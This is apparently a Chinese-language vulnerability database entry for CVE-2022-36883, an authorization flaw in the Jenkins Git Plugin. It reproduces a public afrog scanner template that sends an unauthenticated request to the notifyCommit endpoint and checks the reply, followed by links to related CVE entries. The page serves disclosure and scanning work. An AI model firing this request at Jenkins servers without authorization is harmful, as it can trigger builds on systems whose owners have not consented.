CVE-2022-36883: Git Plugin up to 4.11.3 on Jenkins Build Authorization

日期: 2025-09-01 | 影响软件: Git Plugin | POC: 已公开

漏洞描述

A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.

PoC代码[已公开]

id: CVE-2022-36883

info:
  name: Git Plugin up to 4.11.3 on Jenkins Build Authorization
  author: c-sh0
  severity: high
  verified: true
  description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
  reference:
    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
  tags: cve,cve2022,jenkins,git,auth-bypass
  created: 2023/10/10

set:
  randstr: randomLowercase(32)
rules:
  r0:
    request:
      method: GET
      path: /git/notifyCommit?url={{randstr}}&branches={{randstr}}
    expression: response.status == 200 && response.body.bcontains(b'repository:') && response.body.bcontains(b'SCM API plugin')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-36883.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC